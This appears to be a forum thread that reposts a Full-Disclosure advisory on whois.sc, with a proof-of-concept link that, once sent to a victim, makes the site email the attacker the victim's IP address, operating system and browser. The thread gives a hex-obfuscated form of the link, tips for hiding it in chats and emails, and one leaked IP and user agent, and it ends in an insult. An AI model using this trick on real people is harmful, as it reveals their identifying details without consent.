Getting somebody's ip, browser, os, etc

[iago]

This really isn't terribly exciting, but it's a neat trick, and it shows some creative thought.  And that's one of the main principles of hacking: you've gotta think outside the box.

Title: whois.sc not-big-deal hole
Server-side risk: none
Client-side risk: low risk (private info revealed about the user)

Description:

This might not even be considered a proper security hole, but I
thought it's an interesting way to get the following information about
a user:

- IP Address
- Operating system
- Web browser version

This information can be easily obtained by "tricking" someone to visit
your website and then checking the webserver logs. Email headers also
help, not to mention loud OS detection tools such as xprobe2 and nmap
(which will only work if you're lucky and the "victim" doesn't use a
firewall blocking all incoming traffic).

In this case however, the scenario is a little different because we
use a sign-up service provided by an existing website for our own
purposes (enumeration).

The only limitation of this "trick" is that the attacker needs to use
a different email address for each attack. This is because whois.sc
will set the account activation status to "pending" after requesting
the account activation with your email address for the first time.


The original request to sign-up for an account is a POST request
*similar* to the following:


POST http://www.whois.sc/members/process.html HTTP/1.1
Host: www.whois.sc
Content-Length: 48
action=newaccount&doneurl=&email=test%40test.com


However we can change the request from POST to GET and the application
will happily process the query:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=test%40test.com


PoC:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=attacker%40evilmail.com


Replace "attacker%40evilmail.com" in the previous link with your own
email address (e.g.: myself%40gmail.com) and send it to the "victim".


Also, we could obsfucate our email address by encoding it to hex:

http://www.whois.sc/members/process.html?action=newaccount&doneurl=%252Freverse-ip%252F&email=%61%74%74%61%63%6B%65%72%40%65%76%69%6C%6D%61%69%6C%2E%63%6F%6D


Note: "%40" is "@" in hex. For a good resource to convert strings to
different encodings check out
http://www.thedumbterminal.co.uk/php/stringdecode.php



Regards,

pagvac
Earth, SOLAR SYSTEM
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[deadly7]

Neat. Though, with cPanel (I'm pretty sure Apache gives logs of visitors, too) it's pretty easy to get all of that information.. and with PHP writing to a text file.

[iago]

That's assuming you have a web server. 

And by the way, it works:

---------------------------------------------------
NOTE: You received this message because someone from
142.161.170.11(Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8b5) Gecko/20051025 Firefox/1.4.1)
requested an account for this email address. If you
did not request this account please ignore this message
and you will not be contacted again.
---------------------------------------------------

[zorm]

Just goes to show the problem with using something like $_REQUEST instead of $_POST in PHP.

[Sidoh]

Just goes to show the problem with using something like $_REQUEST instead of $_POST in PHP.

You can spoof POST variables with little more effort.

[iago]

To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button.  With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc..  And on IE for sure, there are several ways to hide where a link is actually sending you to. 

[Sidoh]

To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button.  With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc..  And on IE for sure, there are several ways to hide where a link is actually sending you to. 

I kind of misunderstood the exploit, but now I see what it's doing.  Additionally, you could send them to a link on your site (containing the proper information), which submits a POST form to that website containing information in the URL you sent the person you're attacking.

[iago]

To spoof POST variables, you'd have to have a website, and convince them to click a "submit" button.  With GET variables, you can give them an obfuscated link, which could be done on an IM, a forum, in an email, etc..  And on IE for sure, there are several ways to hide where a link is actually sending you to. 

I kind of misunderstood the exploit, but now I see what it's doing.  Additionally, you could send them to a link on your site (containing the proper information), which submits a POST form to that website containing information in the URL you sent the person you're attacking.

True, but you still need to control a site.  :-P

Yes, your way is possible, but much harder to "exploit"

[Sidoh]

True, but you still need to control a site.  :-P

Yes, your way is possible, but much harder to "exploit"

It wouldn't be difficult at all, IMO.

[iago]

Then can you post a link on this forum that'll do it for me, without going through your own site?  Can you email me a link that'll do it without going through another site?  Can you IM or PM me a link that'll do it, without going through another site? 

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. 

[Sidoh]

Then can you post a link on this forum that'll do it for me, without going through your own site?  Can you email me a link that'll do it without going through another site?  Can you IM or PM me a link that'll do it, without going through another site? 

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. 

Where in your first proposition did you say I couldn't use my own website? :(

[iago]

Then can you post a link on this forum that'll do it for me, without going through your own site?  Can you email me a link that'll do it without going through another site?  Can you IM or PM me a link that'll do it, without going through another site? 

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage. 

Where in your first proposition did you say I couldn't use my own website? :(

True, but you still need to control a site.  :-P

Yes, your way is possible, but much harder to "exploit"

[Sidoh]

Then can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site?

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage.

Where in your first proposition did you say I couldn't use my own website? :(

True, but you still need to control a site. :-P

Yes, your way is possible, but much harder to "exploit"

I do control a site and it's still possible!  T_T

Hehe, this is a pretty useless argument, though.  I think it'd be just as easy to trick someone into visiting your website so you could log their IP address.

[Ergot]

Then can you post a link on this forum that'll do it for me, without going through your own site? Can you email me a link that'll do it without going through another site? Can you IM or PM me a link that'll do it, without going through another site?

And, if you're going through your own site, then you can check the logs anyway, so you aren't gaining any advantage.

Where in your first proposition did you say I couldn't use my own website? :(

True, but you still need to control a site. :-P

Yes, your way is possible, but much harder to "exploit"

I do control a site and it's still possible!  T_T

Hehe, this is a pretty useless argument, though.  I think it'd be just as easy to trick someone into visiting your website so you could log their IP address.

Yea... Just like I can trick people into clicking random things ... (Like the whole Outwar thing).
My friends (In real life(yes I do have real life friends !)) don't trust my links anymore though :(

[Sidoh]

I don't either, you dirty whore.